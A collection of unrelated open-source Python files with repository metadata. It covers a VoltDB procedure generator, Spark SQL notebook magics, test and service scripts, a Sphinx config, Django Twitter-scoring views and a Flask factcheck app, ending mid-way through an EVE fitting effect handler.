PARTITION TABLE P1 ON COLUMN ID;
CREATE PROCEDURE Test AS SELECT ID, TM, VAR FROM P1 WHERE TM < ? AND ID > ?;
'''
    subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
    subprocess.check_call("mkdir -p /tmp/tempGenJavaSPTool".split())
    # change working directory
    os.chdir("/tmp/tempGenJavaSPTool")
    # compile ddl
    f = open("/tmp/tempGenJavaSPTool/ddl.sql", "w")
    f.write(ddl)
    f.close()
    subprocess.check_call("voltdb compile ddl.sql".split())
    if not os.path.exists("catalog.jar"):
        print "cannot generate catalog.jar"
        sys.exit(-1)
    # generate sp
    subprocess.check_call(("unzip catalog.jar catalog.txt -d /tmp/tempGenJavaSPTool").split())
    process_spec_func("Test", "package", "catalog.txt", "./")
    # compare
    if not os.path.exists("Test.java"):
        print "cannot generate java file"
        sys.exit(-1)
    golden = '''
package package;
import org.voltdb.*;
public class Test extends VoltProcedure {
public final SQLStmt stmt = new SQLStmt("SELECT ID, TM, VAR FROM P1 WHERE TM < ? AND ID > ?;");
public VoltTable[] run(org.voltdb.types.TimestampType param0, int param1) {
voltQueueSQL(stmt, param0, param1);
return voltExecuteSQL();
}
}
'''
    f = open("/tmp/tempGenJavaSPTool/golden.java", "w")
    f.write(golden)
    f.close()
    if filecmp.cmp('golden.java', 'Test.java'):
        print "generated our expected java file"
        rv = 0
    else:
        print "generated file is different from our expectation"
        rv = -1
    subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
    sys.exit(rv)
def main():
    """Drive the tool: unpack a .jar catalog if needed, then generate stubs."""
    opts, args = parse_cmd()
    if opts.self_test:
        self_test()
    if len(args) != 1:
        print "ERROR can only handle one ddl"
        sys.exit(-1)
    if args[0].endswith(".jar"):
        # Pull catalog.txt out of the jar into a scratch directory.
        subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
        subprocess.check_call("mkdir -p /tmp/tempGenJavaSPTool".split())
        subprocess.check_call(("unzip " + args[0] + " catalog.txt -d /tmp/tempGenJavaSPTool").split())
        input_file = "/tmp/tempGenJavaSPTool/catalog.txt"
    else:
        input_file = args[0]
    try:
        if opts.procedure:
            process_spec_func(opts.procedure, opts.package, input_file, opts.target_dir)
        else:
            process_whole_ddl(opts.package, input_file, opts.target_dir)
        if args[0].endswith(".jar"):
            subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
    except Exception as e:
        # Clean up the scratch directory before propagating the failure.
        subprocess.check_call("rm -rf /tmp/tempGenJavaSPTool".split())
        raise e
def parse_cmd():
    """Build the command-line option parser and parse sys.argv.

    Returns the (options, positional_args) pair from OptionParser.parse_args().
    """
    parser = OptionParser()
    # All string-valued options share the same store action.
    string_options = [
        ("--target_dir", "target_dir", "./"),
        ("--package", "package", None),
        ("--procedure", "procedure", None),
    ]
    for flag, dest, default in string_options:
        parser.add_option(flag, type="string", action="store", dest=dest, default=default)
    parser.add_option("--self-test", action="store_true", dest="self_test", default=False)
    return parser.parse_args()
if __name__ == "__main__":
    # Run the generator only when invoked as a script, not on import.
    main()
|
zheguang/voltdb
|
tools/gen_sp_from_catalog.py
|
Python
|
agpl-3.0
| 9,550
|
#
# IPython magic functions to use with Pyspark and Spark SQL
# The following code is intended as examples of shortcuts to simplify the use of SQL in pyspark
# The defined functions are:
#
# %sql <statement> - return a Spark DataFrame for lazy evaluation of the SQL
# %sql_show <statement> - run the SQL statement and show max_show_lines (50) lines
# %sql_display <statement> - run the SQL statement and display the results using a HTML table
# - this is implemented passing via Pandas and displays up to max_show_lines (50)
# %sql_explain <statement> - display the execution plan of the SQL statement
#
# Use: %<magic> for line magic or %%<magic> for cell magic.
#
# Author: Luca.Canali@cern.ch
# September 2016, updated Sep 2019
#
from IPython.core.magic import register_line_cell_magic
# Configuration parameters
# These module-level knobs are read at call time by the magics below, so they
# can be reassigned interactively in a notebook session.
max_show_lines = 50 # Limit on the number of lines to show with %sql_show and %sql_display
detailed_explain = True # Set to False if you want to see only the physical plan when running explain
@register_line_cell_magic
def sql(line, cell=None):
    """Return a Spark DataFrame for lazy evaluation of the sql. Use: %sql or %%sql"""
    # Cell magic supplies `cell`; line magic supplies only `line`.
    statement = line if cell is None else cell
    return spark.sql(statement)
@register_line_cell_magic
def sql_show(line, cell=None):
    """Execute sql and show the first max_show_lines lines. Use: %sql_show or %%sql_show"""
    if cell is None:
        statement = line
    else:
        statement = cell
    df = spark.sql(statement)
    return df.show(max_show_lines)
@register_line_cell_magic
def sql_display(line, cell=None):
    """Execute sql and convert results to Pandas DataFrame for pretty display or further processing.
    Use: %sql_display or %%sql_display"""
    statement = line if cell is None else cell
    # Cap the result set before collecting it to the driver as Pandas.
    limited = spark.sql(statement).limit(max_show_lines)
    return limited.toPandas()
@register_line_cell_magic
def sql_explain(line, cell=None):
    """Display the execution plan of the sql. Use: %sql_explain or %%sql_explain"""
    if cell is None:
        statement = line
    else:
        statement = cell
    df = spark.sql(statement)
    # detailed_explain=True also prints the parsed/analyzed/optimized plans.
    return df.explain(detailed_explain)
|
LucaCanali/Miscellaneous
|
Pyspark_SQL_Magic_Jupyter/IPython_Pyspark_SQL_Magic.py
|
Python
|
apache-2.0
| 2,061
|
from Parser.Parser import Parser
from EmptyContext import EmptyContext
class AbstractNumberParser(Parser):
    """Facade parser that delegates to a globally installed number parser.

    The concrete parser is registered once via set_parser() and shared by all
    instances through the class attribute `parser`.
    """

    # The currently installed concrete parser (class or factory callable).
    parser = None

    def __init__(self, text, context):
        super(AbstractNumberParser, self).__init__(text, context)

    def parser_default(self):
        # Expose the shared parser as this instance's default.
        return AbstractNumberParser.parser

    @staticmethod
    def default(text, context):
        # Instantiate the installed parser directly with the given input.
        return AbstractNumberParser.parser(text, context)

    @staticmethod
    def set_parser(new_parser):
        # Install the concrete parser used by default()/parser_default().
        AbstractNumberParser.parser = new_parser
|
mathiasquintero/LlamaLang
|
Parser/Data/Numbers/AbstractNumberParser.py
|
Python
|
mit
| 545
|
##########################################################################
#This file is part of WTFramework.
#
# WTFramework is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WTFramework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WTFramework. If not, see <http://www.gnu.org/licenses/>.
##########################################################################
from wtframework.wtf.testobjects.test_watchers import DelayedTestFailTestWatcher, \
CaptureScreenShotOnErrorTestWatcher
from wtframework.wtf.testobjects.testcase import WatchedTestCase
import inspect
class WTFBaseTest(WatchedTestCase):
    '''
    Test Cases can extend this test to additional unit test functionality such as
    take screenshot on failure.
    '''

    def __init__(self, methodName='runTest', webdriver_provider=None, screenshot_util=None):
        super(WTFBaseTest, self).__init__(methodName)
        self._register_watcher(CaptureScreenShotOnErrorTestWatcher(webdriver_provider, screenshot_util))
        # Note this watcher should be registered after all other watchers that use
        # on_test_passed() event.
        self._delayed_test_watcher = DelayedTestFailTestWatcher()
        self._register_watcher(self._delayed_test_watcher)

    def assertWithDelayedFailure(self, assert_method, *args, **kwargs):
        """
        Cause an assertion failure to be delayed till the end of the test.

        Usage:
            self.assertWithDelayedFailure(self.AssertEquals, 100, percent)

        @param assert_method: Reference to assert method.
        @param *args: positional parameters to pass into the assert method.
        @param **kwargs: keyword parameters to pass into the assert method.
        """
        frame = None
        try:
            # Best-effort: capture the caller's frame so failure reports can
            # point at the test line that made the delayed assertion.
            frame = inspect.getouterframes(inspect.currentframe())[1]
        except Exception:
            # FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; frame info is optional, so only
            # ordinary exceptions are ignored here.
            pass
        assert_func = lambda: assert_method(*args, **kwargs)
        generated_exception = self._delayed_test_watcher.delay_failure(assert_func, frame)
        if generated_exception:
            # Call our on_fail for our test watchers. So we can trigger our screen
            # capture at moment of failure.
            for test_watcher in self.__wtf_test_watchers__:
                test_watcher.on_test_failure(self, self._resultForDoCleanups, generated_exception)
|
LeXuZZ/localway_tests
|
wtframework/wtf/testobjects/basetests.py
|
Python
|
gpl-3.0
| 2,805
|
#!/usr/bin/python
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example accepts the given proposal at the given revision."""
import argparse
import os
import pprint
import sys
sys.path.insert(0, os.path.abspath('..'))
from googleapiclient.errors import HttpError
import samples_util
DEFAULT_ACCOUNT_ID = 'INSERT_ACCOUNT_ID'
DEFAULT_PROPOSAL_ID = 'INSERT_PROPOSAL_ID'
def main(ad_exchange_buyer, account_id, proposal_id, proposal_revision):
    """Accept the given proposal at the given revision.

    Args:
        ad_exchange_buyer: initialized Ad Exchange Buyer service object.
        account_id: integer ID of the buyer account.
        proposal_id: ID of the proposal to accept.
        proposal_revision: integer revision being accepted.
    """
    # The API only needs the revision number in the request body.
    request_body = {'proposalRevision': proposal_revision}
    try:
        request = ad_exchange_buyer.accounts().proposals().accept(
            accountId=account_id, proposalId=proposal_id, body=request_body)
        response = request.execute()
        print(f'Successfully accepted proposal with ID "{proposal_id}":')
        pprint.pprint(response)
    except HttpError as e:
        print(e)
if __name__ == '__main__':
    # For optional arguments, default values are overridden if set.
    parser = argparse.ArgumentParser(description='Accepts the given proposal.')
    parser.add_argument('-a', '--account_id', required=False, type=int,
                        default=DEFAULT_ACCOUNT_ID,
                        help=('The integer id of the account you\'re using to '
                              'create the proposal.'))
    parser.add_argument('-i', '--proposal_id', required=False,
                        default=DEFAULT_PROPOSAL_ID,
                        help=('The ID of the proposal to be accepted.'))
    parser.add_argument('-r', '--proposal_revision', required=True, type=int,
                        help=('The integer revision of the proposal being '
                              'accepted. This is a required field.'))
    args = parser.parse_args()
    # Build the authorized API client; GetService reads the key file
    # configured in samples_util.py.
    try:
        service = samples_util.GetService('v2beta1')
    except IOError as ex:
        print(f'Unable to create adexchangebuyer service - {ex}')
        print('Did you specify the key file in samples_util.py?')
        sys.exit(1)
    main(service, args.account_id, args.proposal_id, args.proposal_revision)
|
googleads/googleads-adxbuyer-examples
|
python/samples/v2_x/accept_proposal.py
|
Python
|
apache-2.0
| 2,543
|
import os.path
from resource_management.core.resources.system import File, Execute
import yaml
# pylint: disable=unused-argument
class Cassandra(object):
    """Ambari service wrapper that configures and controls Cassandra.

    The lifecycle hooks (configure/start/stop/status) are called by the
    Ambari agent with an `env` argument that this implementation ignores.
    """

    def configure(self, env):
        # `params` is an Ambari-generated module only importable at agent
        # runtime, hence the function-local import.
        import params
        File(os.path.join(params.cassandra_conf_dir, 'cassandra.yaml'),
             content=yaml.safe_dump(params.cassandra_configs),
             # FIX: was `mode=0644` — old-style octal literals are a
             # SyntaxError on Python 3; `0o644` is valid on Python 2.6+ too.
             mode=0o644,
             owner=params.cassandra_user)

    def start(self, env):
        Execute(('service', 'cassandra', 'start'))

    def stop(self, env):
        Execute(('service', 'cassandra', 'stop'))

    def status(self, env):
        Execute(('service', 'cassandra', 'status'))
|
jimbobhickville/ambari-cassandra-service
|
package/scripts/cassandra.py
|
Python
|
apache-2.0
| 644
|
# -*- coding: utf-8 -*-
#
# Amazon Distributed Runner documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 26 13:54:46 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../adr'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',      # pull documentation from docstrings
    'sphinxcontrib.napoleon',  # Google/NumPy-style docstring parsing
    'sphinx.ext.mathjax',      # render math with MathJax
    'sphinx.ext.viewcode',     # link generated docs to highlighted source
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Amazon Distributed Runner'
copyright = u'2016, Bas Hoonhout'
author = u'Bas Hoonhout'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AmazonDistributedRunnerdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AmazonDistributedRunner.tex', u'Amazon Distributed Runner Documentation',
u'Bas Hoonhout', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'amazondistributedrunner', u'Amazon Distributed Runner Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'AmazonDistributedRunner', u'Amazon Distributed Runner Documentation',
     author, 'AmazonDistributedRunner', 'One line description of project.',
     # NOTE(review): the description above is still the sphinx-quickstart placeholder.
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
openearth/amazon-distributed-runner
|
docs/conf.py
|
Python
|
gpl-3.0
| 9,513
|
__doc_format__ = "reStructuredText"
'''
Shows info about netCDF on command line!
:Author: kmu
:Created: 18. jan. 2012
'''
''' Imports '''
# Built-in
import sys
# NOTE(review): Python 2 script — execfile() and the print statement below do
# not exist on Python 3.  This call sets up sys.path for the pysenorge import.
execfile("../themes/set_pysenorge_path.py")
# Additional
# Own
from pysenorge.io.nc import NCreport

# Expect exactly one argument: the netCDF file to report on.
if len(sys.argv) != 2:
    print "USAGE: NCreport <path_to_netCDF_file>"
else:
    NCreport(sys.argv[1], stdout=True)
|
kmunve/pysenorge
|
pysenorge/tools/NCreport.py
|
Python
|
gpl-3.0
| 401
|
from django.shortcuts import render, HttpResponse
from django.http import JsonResponse
import tweepy
from .models import TwitterUser
from os import environ
# Twitter API credentials come from the environment; this raises KeyError at
# import time if any of them is missing.
config = {
    'consumer_key': environ['consumer_key'],
    'consumer_secret': environ['consumer_secret'],
    'access_key': environ['access_key'],
    'access_secret': environ['access_secret']
}
# Module-level authenticated tweepy client shared by every view below.
auth = tweepy.OAuthHandler(config["consumer_key"], config["consumer_secret"])
auth.set_access_token(config["access_key"], config["access_secret"])
api = tweepy.API(auth)
# Create your views here.
def getInitialUserData(request):
    """Seed the TwitterUser table with users found near Delhi.

    Pages through the Twitter user-search API (15 pages) and stores each
    user's id, follower count, location, avatar URL and lowercased screen
    name.  Users that are already stored are skipped.
    """
    for page in range(1, 16):
        searched_users = list(api.search_users(
            q="India", page=page, geocode="28.6139,77.2090,50km"))
        # Iterate the results directly instead of by index.
        for user in searched_users:
            json_data = user._json
            try:
                TwitterUser.objects.create(
                    twitter_id=json_data['id'],
                    follower_count=json_data['followers_count'],
                    twitter_username=json_data['screen_name'].lower(),
                    profile_image=json_data['profile_image_url'],
                    location=json_data['location'])
            except Exception:
                # FIX: was a bare `except:` — most likely a uniqueness
                # violation for an already-stored user; only ordinary
                # exceptions are ignored now.
                pass
    return HttpResponse("All data fetched")
def getTweetData(request):
    """Fill in total favourite/retweet counts for stored users.

    For every TwitterUser lacking totals, fetch the user's timeline and sum
    favourites and retweets across it.  Returns early with an error response
    when the Twitter API rate limit is hit.
    """
    for user in TwitterUser.objects.all():
        uid = user.twitter_id
        if user.total_fav_count and user.total_retweet_count:
            continue  # totals already computed
        try:
            timeline = list(api.user_timeline(uid))
            favorite_count = 0
            retweet_count = 0
            for tweet in timeline:
                tweet_json = tweet._json
                favorite_count += tweet_json['favorite_count']
                retweet_count += tweet_json['retweet_count']
            try:
                t = TwitterUser.objects.get(twitter_id=uid)
            except TwitterUser.DoesNotExist:
                # FIX: previously `t` was used even when this lookup failed
                # (after a bare `except: print uid`), raising NameError that
                # was then misreported as a rate-limit error.  Skip instead.
                continue
            t.total_fav_count = favorite_count
            t.total_retweet_count = retweet_count
            t.save()
        except Exception:
            # tweepy raises when the rate limit is exhausted; tell the caller
            # to retry after the 15-minute window.
            return HttpResponse("Rate Limit exceeded! Wait 15 mins")
    return HttpResponse("Favourites and Retweets calculated!")
def calculate_rank():
    """Assign dense 1-based ranks to all users by descending impact score."""
    ranked_users = TwitterUser.objects.all().order_by('-impact_score')
    for position, user in enumerate(ranked_users, start=1):
        user.rank = position
        user.save()
def calculate_impact_score(request):
    """Compute and persist a 0-100 impact score for every user, then re-rank."""
    max_impact_val = 161300000
    for user in TwitterUser.objects.all():
        # Only users whose tweet totals have been collected can be scored.
        if not (user.total_retweet_count and user.total_fav_count):
            continue
        raw_score = social_impact_formula(
            user.total_retweet_count,
            user.total_fav_count,
            0,
            user.follower_count)
        # Scale against the assumed maximum and wrap into [0, 100).
        user.impact_score = ((raw_score / max_impact_val) * 10000) % 100
        user.save()
    calculate_rank()
    return HttpResponse("Social Impact Score calculated")
def social_impact_formula(retweet, favorites, tweets, followers):
    """Weighted linear combination of engagement metrics."""
    weights = (8.5, 5.5, 6, 9.25)
    metrics = (retweet, favorites, tweets, followers)
    return sum(weight * metric for weight, metric in zip(weights, metrics))
def calculate_for_single_user(request, username):
    """Return (creating if needed) the serialized data for one Twitter user.

    NOTE(review): Python 2 syntax (`except Exception, e`, print statement).
    """
    username = username.lower()
    try:
        timeline = api.user_timeline(username)
    except Exception, e:  # API call failed; fall through with timeline=None
        timeline = None
    if timeline:
        timeline = list(timeline)
        favorite_count = 0
        retweet_count = 0
        for tweet in range(len(timeline)):
            json_data = timeline[tweet]._json
            favorite_count += json_data['favorite_count']
            retweet_count += json_data['retweet_count']
        # Profile fields are read from the last tweet's embedded user object.
        follower_count = json_data['user']['followers_count']
        location = json_data['user']['location']
        profile_image_url = json_data['user']['profile_image_url']
        twitter_id = json_data['user']['id']
    try:
        # Existing user: return the full serialized table as-is.
        t = TwitterUser.objects.get(twitter_username=username)
        return return_json_data()
        print "done"  # NOTE(review): unreachable — follows a return
    except:
        # NOTE(review): bare except — any failure above lands here, not only
        # TwitterUser.DoesNotExist.
        if not timeline:
            return JsonResponse({"message": "username not found"}, status=400, content_type="application/json")
        t = TwitterUser.objects.create(twitter_id=twitter_id, total_fav_count=favorite_count, total_retweet_count=retweet_count,
                                       follower_count=follower_count, twitter_username=username, profile_image=profile_image_url, location=location)
        # Score and rank the newly created user before responding.
        max_impact_val = 161300000
        social_impact_score = social_impact_formula(
            t.total_retweet_count, t.total_fav_count, 0, t.follower_count)
        t.impact_score = ((social_impact_score / max_impact_val) * 10000) % 100
        t.save()
        calculate_rank()
        return return_json_data()
def return_json_data():
    """Serialize every stored TwitterUser as a JSON array response."""
    payload = all_twitter_user_serializer(TwitterUser.objects.all())
    return JsonResponse(payload, safe=False, status=200,
                        content_type="application/json")
def single_twitter_user_serializer(twitter_user):
    """Flatten one TwitterUser model instance into a plain dict."""
    return {
        'twitter_id': twitter_user.twitter_id,
        'twitter_username': twitter_user.twitter_username,
        'follower_count': twitter_user.follower_count,
        'total_fav_count': twitter_user.total_fav_count,
        'total_retweet_count': twitter_user.total_retweet_count,
        'location': twitter_user.location,
        'impact_score': twitter_user.impact_score,
        # Note the output key differs from the model attribute name.
        'profile_image_url': twitter_user.profile_image,
        'rank': twitter_user.rank,
    }
def all_twitter_user_serializer(twitter_users):
    """Flatten an iterable of TwitterUser instances into a list of dicts."""
    return [
        {
            'twitter_id': user.twitter_id,
            'twitter_username': user.twitter_username,
            'follower_count': user.follower_count,
            'total_fav_count': user.total_fav_count,
            'total_retweet_count': user.total_retweet_count,
            'location': user.location,
            'impact_score': user.impact_score,
            # Note the output key differs from the model attribute name.
            'profile_image_url': user.profile_image,
            'rank': user.rank,
        }
        for user in twitter_users
    ]
def index(request):
    # Render the single-page front end; data is loaded via the JSON views above.
    return render(request, 'index.html', {})
|
CuriousLearner/AngelHackDelhi2016
|
trendingtweeps/tweeps/views.py
|
Python
|
mit
| 6,463
|
#!/usr/bin/env python
"""
Example application views.
Note that `render_template` is wrapped with `make_response` in all application
routes. While not necessary for most Flask apps, it is required in the
App Template for static publishing.
"""
import app_config
import logging
import oauth
import os
import parse_doc
import static
from copydoc import CopyDoc
import copytext
from flask import Flask, make_response, render_template
from flask_cors import CORS, cross_origin
from render_utils import flatten_app_config, make_context
from render_utils import smarty_filter, urlencode_filter
from werkzeug.debug import DebuggedApplication
app = Flask(__name__)
app.debug = app_config.DEBUG
# Allow cross-origin requests so embeds can be served from other domains.
CORS(app)
# Jinja template filters used by the templates below.
app.add_template_filter(smarty_filter, name='smarty')
app.add_template_filter(urlencode_filter, name='urlencode')
logging.basicConfig(format=app_config.LOG_FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(app_config.LOG_LEVEL)
@app.route('/factcheck.html', methods=['GET', 'OPTIONS'])
def _factcheck():
    """Render the liveblog; only published posts are included."""
    return make_response(
        render_template('factcheck.html', **get_factcheck_context()))
@app.route('/factcheck_preview.html', methods=['GET', 'OPTIONS'])
def _preview():
    """Render the factcheck page including both published and draft posts."""
    return make_response(
        render_template('factcheck.html', **get_factcheck_context()))
@app.route('/embeds/<slug>.html', methods=['GET', 'OPTIONS'])
def _embed(slug):
    """Render one published annotation plus its preceding context paragraphs."""
    context = get_factcheck_context()
    context['slug'] = slug
    contents = context['contents']
    published_annotations = [
        post for post in contents
        if post['type'] == 'annotation' and post['published'] == 'yes'
    ]
    # First annotation matching the slug (IndexError if none exists).
    target = [post for post in published_annotations if post['slug'] == slug][0]
    context['filtered'] = target
    # Include up to `prior` document paragraphs before the annotation.
    position = contents.index(target)
    paragraph_count = int(target.get('prior', 1))
    context['prior'] = contents[position - paragraph_count:position]
    return make_response(render_template('embed.html', **context))
@app.route('/embeds/', methods=['GET', 'OPTIONS'])
def _embedlist():
    """
    List out embeddable annotations
    """
    context = get_factcheck_context()
    contents = context['contents']
    # Published annotations only.  (FIX: the original filtered on
    # published == 'yes' a second time, which was redundant.)
    annotations = [post for post in contents
                   if post['type'] == 'annotation' and post['published'] == 'yes']
    context['slugs'] = [post['slug'] for post in annotations]
    return make_response(render_template('embedlist.html', **context))
@app.route('/share.html', methods=['GET', 'OPTIONS'])
def _share():
    """Render the social-share page from the factcheck context."""
    return make_response(
        render_template('share.html', **get_factcheck_context()))
@app.route('/copydoc.html', methods=['GET', 'OPTIONS'])
def _copydoc():
    """Render the parsed transcript document for inspection."""
    with open(app_config.TRANSCRIPT_HTML_PATH) as f:
        doc = CopyDoc(f.read())
    return make_response(render_template('copydoc.html', doc=doc))
@app.route('/child.html')
def child():
    """Render the example child page."""
    return make_response(render_template('child.html', **make_context()))
@app.route('/')
@app.route('/index.html')
@oauth.oauth_required
def index():
    """Render the parent page; access is gated by the OAuth decorator."""
    return make_response(render_template('parent.html', **make_context()))
@app.route('/preview.html')
def preview():
    """Render the parent page without the OAuth requirement."""
    return make_response(render_template('parent.html', **make_context()))
# Static-asset and OAuth routes live in their own blueprints.
app.register_blueprint(static.static)
app.register_blueprint(oauth.oauth)
def get_factcheck_context():
    """
    Get factcheck context
    for production we will reuse a fake g context
    in order not to perform the parsing twice
    """
    from flask import g
    context = make_context()
    context['config'] = flatten_app_config()
    cached = getattr(g, 'parsed_factcheck', None)
    if cached is not None:
        logger.debug("found parsed_factcheck in g")
        context.update(cached)
    else:
        logger.debug("did not find parsed_factcheck")
        # No cached parse on g: parse the transcript HTML from disk.
        with open(app_config.TRANSCRIPT_HTML_PATH) as f:
            context.update(parse_document(f.read()))
    return context
def parse_document(html):
    """Parse raw transcript HTML into the factcheck context fragment."""
    return parse_doc.parse(CopyDoc(html))
# Enable Werkzeug debug pages
# The WSGI server imports `wsgi_app` from this module.
if app_config.DEBUG:
    wsgi_app = DebuggedApplication(app, evalex=False)
else:
    wsgi_app = app
# Catch attempts to run the app directly
if __name__ == '__main__':
    logging.error('This command has been removed! Run "fab app" instead!')
|
nprapps/debates
|
app.py
|
Python
|
mit
| 5,127
|
# subsystemBonusCaldariPropulsion2WarpSpeed
#
# Used by:
# Subsystem: Tengu Propulsion - Interdiction Nullifier
type = "passive"
def handler(fit, src, context):
    """Apply the Tengu propulsion subsystem's warp-speed bonus to the ship."""
    bonus = src.getModifiedItemAttr("subsystemBonusCaldariPropulsion2")
